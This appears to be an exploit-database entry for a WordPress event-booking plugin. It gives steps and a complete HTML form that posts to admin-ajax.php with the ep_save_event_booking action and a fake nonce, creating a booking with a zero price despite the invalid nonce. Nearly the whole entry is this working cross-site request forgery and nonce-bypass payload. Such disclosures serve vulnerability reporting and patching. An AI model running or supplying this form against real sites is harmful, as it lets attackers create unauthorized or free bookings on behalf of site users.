Share
## https://sploitus.com/exploit?id=WPEX-ID:CE564628-3D15-4BC5-8B8E-60B71786AC19
Create an Event, noting its ID. Add a ticket type to the Event (the details don't matter).

As a logged-in user, visit a page with the following form, replace the event ID, and submit the form. Note that a new Booking is created, despite the incorrect nonce.

<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
      <input type="text" name="action" value="ep_save_event_booking" />
      <textarea name="data">
ep_event_booking_event_id=EVENT_ID&ep_event_booking_user_id=1&ep_event_booking_total_price=0&ep_event_booking_total_tickets=1&ep_save_event_booking_nonce=1234
      </textarea>
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>